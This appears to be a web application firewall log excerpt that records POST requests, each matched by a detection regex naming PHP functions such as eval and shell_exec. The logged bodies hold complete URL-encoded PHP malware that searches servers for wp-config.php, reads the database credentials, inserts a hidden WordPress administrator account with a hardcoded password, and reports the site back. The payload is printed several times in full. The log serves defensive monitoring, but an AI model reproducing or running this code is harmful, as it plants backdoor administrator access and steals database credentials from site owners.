0%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 12:06:58","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> Ia:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/ HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-dest:document\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncontent-length:12640\ncookie:4=1af844051764377410b827578daae50e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvFJRvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzkiL2gyMPV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\nsec-ch-ua:\"Google Chrome\";v=\"107\", \"Chromium\";v=\"107\", \"Not=A?Brand\";v=\"24\"\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-user:?1\nsec-fetch-site:none\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36\nsec-fetch-mode:navigate\n\nIa=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 12:07:30","213.209.159.254","POST","\/","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/120.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> 